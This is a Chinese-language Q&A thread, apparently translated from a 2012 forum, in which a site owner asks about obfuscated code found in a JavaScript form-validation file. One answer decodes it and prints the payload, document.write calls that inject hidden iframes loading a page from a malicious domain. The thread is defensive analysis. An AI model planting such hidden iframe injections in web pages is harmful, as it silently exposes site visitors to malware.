1. 首页
  2. 问答
  3. 这是什么奇怪的代码在我的JavaScript文件中找到?

这是什么奇怪的代码在我的JavaScript文件中找到?

2012-08-05 26 views
3

我的表单验证文件之一,我发现下面的代码(见下文) 我的朋友扫描我的网站时指出,它是一种病毒。这是什么奇怪的代码在我的JavaScript文件中找到?

但究竟是什么?

http://pastebin.com/P8KBm0xk

来源

2012-08-05 Ben

+1

是的...不会点击它。 – 2012-08-05 22:21:26

+0

@JaredFarrish,发布的链接是** pastebin **,而不是可能被感染的网站。 – arttronics 2012-08-05 22:23:13

+0

@arttronics - 去吧。 (是的,我知道什么是pastebin。) – 2012-08-05 22:23:28

回答

5

一种病毒。我在字符串中包含一些带Unicode转义字符的字符串,第一个是一些html,第二个是"write"。然后,document[arr[1]](arr[0])执行,转化为以下几点:

document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>'); 
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');

我不知道(并不会检查)这些东西包括I帧,有可能会出现一些漏洞。

此外,代码不包含(这两个iframe的写入间)的一些功能(_1lOO0l),这可能反转义IlO字符串之前,它是eval ED(是的,EVAL是邪恶的!:-),但有在你的pastebin片段前面有一些缺失的代码,所以我不能告诉你他们到底做了什么。你能把整个剧本给我们吗?

来源

2012-08-05 22:24:18 Bergi

+2

您可以查看链接是已知的还是怀疑是恶意软件。例如:http://www.google.com/safebrowsing/diagnostic?site=mazda.georgewkohn.com – 2012-08-05 22:31:53

+0

@JaredFarrish:谢谢,好主意。 – Bergi 2012-08-05 22:36:17

+0

** + 1 **优秀的答案Bergi。另外,优秀的评论Jarred! ** + 1 **,谢谢! – arttronics 2012-08-05 22:41:48

3

这是一个混淆的病毒。与所有这些东西的某个地方将是一个eval()。如果你想知道它究竟做了什么,你将不得不解码的部分,看看。

更有趣的是,这些东西是如何在代码中结束的。

来源

2012-08-05 22:25:11

相关问题

 相关问题